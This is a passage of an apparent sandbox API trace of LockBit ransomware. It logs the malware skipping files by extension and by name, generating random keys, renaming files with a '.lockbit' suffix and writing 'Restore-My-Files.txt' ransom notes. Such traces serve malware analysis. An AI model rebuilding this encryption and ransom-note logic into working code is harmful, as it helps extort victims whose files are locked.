office\\clipart\\pub60cor\\j0152414.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0144.545] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0144.545] malloc (_Size=0x40068) returned 0x3df0008 [0144.545] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=24844) returned 1 [0144.545] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.546] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.546] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0144.546] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.546] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.546] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0144.546] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0144.553] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152414.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152414.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0144.553] malloc (_Size=0xa6) returned 0x1fa2ed8 [0144.553] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0144.555] free (_Block=0x1fa2ed8) [0144.555] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152414.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0144.555] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0144.555] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0144.556] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65f4d5d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x3734, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0152430.WMF", cAlternateFileName="")) returned 1 [0144.556] lstrcmpiW (lpString1=".", lpString2="J0152430.WMF") returned -1 [0144.556] lstrcmpiW (lpString1="..", lpString2="J0152430.WMF") returned -1 [0144.556] PathFindExtensionW (pszPath="J0152430.WMF") returned=".WMF" [0144.556] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0144.556] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0144.556] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0144.556] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0144.556] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0144.556] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0144.556] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0144.556] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0144.556] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0144.556] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0144.556] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0144.556] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0144.556] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0144.556] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0144.556] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0144.556] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0144.556] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0144.556] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0144.557] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0144.557] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0144.557] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0144.557] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0144.557] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0144.557] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0144.557] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0144.557] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0144.557] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0144.557] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0144.557] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0144.557] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0144.557] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0144.557] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0144.557] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0144.557] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0144.557] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0144.557] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0144.557] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0144.557] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0144.557] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0144.557] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0144.557] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0144.557] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0144.558] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0144.558] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0144.558] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0144.558] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0144.558] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0144.558] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0152430.WMF") returned 1 [0144.558] lstrcmpiW (lpString1="ntldr", lpString2="J0152430.WMF") returned 1 [0144.558] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0152430.WMF") returned 1 [0144.558] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0152430.WMF") returned -1 [0144.558] lstrcmpiW (lpString1="autorun.inf", lpString2="J0152430.WMF") returned -1 [0144.558] lstrcmpiW (lpString1="thumbs.db", lpString2="J0152430.WMF") returned 1 [0144.558] lstrcmpiW (lpString1="iconcache.db", lpString2="J0152430.WMF") returned -1 [0144.558] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0144.558] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152430.WMF") returned=".WMF" [0144.558] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0144.558] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0144.558] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0144.558] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0144.558] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0144.558] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0144.558] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0144.558] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0144.559] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0144.559] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0144.559] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0144.559] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0144.559] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0144.559] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0144.559] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0144.559] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0144.559] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0144.559] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0144.559] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0144.559] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0144.559] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0144.559] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0144.559] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0144.559] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0144.559] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0144.559] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0144.559] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0144.559] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0144.559] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152430.WMF.lockbit") returned 72 [0144.559] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152430.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152430.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0144.561] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0144.561] malloc (_Size=0x40068) returned 0x3df0008 [0144.561] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=14132) returned 1 [0144.561] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.562] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.562] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0144.562] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.562] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.562] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0144.562] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0144.567] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152430.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152430.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0144.567] malloc (_Size=0xa6) returned 0x1fa2ed8 [0144.567] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0144.569] free (_Block=0x1fa2ed8) [0144.569] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152430.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0144.569] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0144.569] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0144.569] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5642c4d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x406c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0152432.WMF", cAlternateFileName="")) returned 1 [0144.569] lstrcmpiW (lpString1=".", lpString2="J0152432.WMF") returned -1 [0144.569] lstrcmpiW (lpString1="..", lpString2="J0152432.WMF") returned -1 [0144.569] PathFindExtensionW (pszPath="J0152432.WMF") returned=".WMF" [0144.569] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0144.569] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0144.569] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0144.569] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0144.569] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0144.569] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0144.569] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0144.569] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0144.569] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0144.570] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0144.570] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0144.570] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0144.570] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0144.570] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0144.570] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0144.570] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0144.570] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0144.570] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0144.570] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0144.570] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0144.570] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0144.570] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0144.570] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0144.570] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0144.570] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0144.570] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0144.570] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0144.570] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0144.570] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0144.570] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0144.570] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0144.570] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0144.570] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0144.570] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0144.570] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0144.570] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0144.571] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0144.571] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0144.571] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0144.571] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0144.571] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0144.571] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0144.571] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0144.571] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0144.571] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0144.571] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0144.571] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0144.571] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0152432.WMF") returned 1 [0144.571] lstrcmpiW (lpString1="ntldr", lpString2="J0152432.WMF") returned 1 [0144.571] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0152432.WMF") returned 1 [0144.571] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0152432.WMF") returned -1 [0144.571] lstrcmpiW (lpString1="autorun.inf", lpString2="J0152432.WMF") returned -1 [0144.571] lstrcmpiW (lpString1="thumbs.db", lpString2="J0152432.WMF") returned 1 [0144.571] lstrcmpiW (lpString1="iconcache.db", lpString2="J0152432.WMF") returned -1 [0144.571] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0144.571] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152432.WMF") returned=".WMF" [0144.572] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0144.572] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0144.572] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0144.572] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0144.572] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0144.572] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0144.572] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0144.572] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0144.572] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0144.572] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0144.572] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0144.572] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0144.572] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0144.572] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0144.572] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0144.572] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0144.572] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0144.572] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0144.572] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0144.572] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0144.572] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0144.572] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0144.572] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0144.572] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0144.573] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0144.573] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0144.573] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0144.573] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0144.573] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152432.WMF.lockbit") returned 72 [0144.573] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152432.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152432.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0144.574] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0144.574] malloc (_Size=0x40068) returned 0x3df0008 [0144.574] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=16492) returned 1 [0144.574] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.575] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.575] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0144.575] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.575] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.575] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0144.575] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0144.580] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152432.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152432.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0144.580] malloc (_Size=0xa6) returned 0x1fa2ed8 [0144.580] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0144.581] free (_Block=0x1fa2ed8) [0144.581] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152432.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0144.581] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0144.581] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0144.582] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65f4d5d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x2c4c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0152436.WMF", cAlternateFileName="")) returned 1 [0144.582] lstrcmpiW (lpString1=".", lpString2="J0152436.WMF") returned -1 [0144.582] lstrcmpiW (lpString1="..", lpString2="J0152436.WMF") returned -1 [0144.582] PathFindExtensionW (pszPath="J0152436.WMF") returned=".WMF" [0144.582] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0144.582] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0144.582] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0144.582] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0144.582] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0144.582] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0144.582] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0144.582] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0144.582] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0144.582] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0144.582] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0144.582] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0144.582] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0144.582] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0144.582] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0144.582] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0144.582] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0144.582] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0144.582] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0144.582] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0144.582] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0144.582] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0144.583] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0144.583] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0144.583] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0144.583] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0144.583] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0144.583] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0144.583] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0144.583] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0144.583] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0144.583] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0144.583] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0144.583] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0144.583] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0144.583] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0144.583] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0144.583] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0144.583] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0144.583] lstrcmpiW 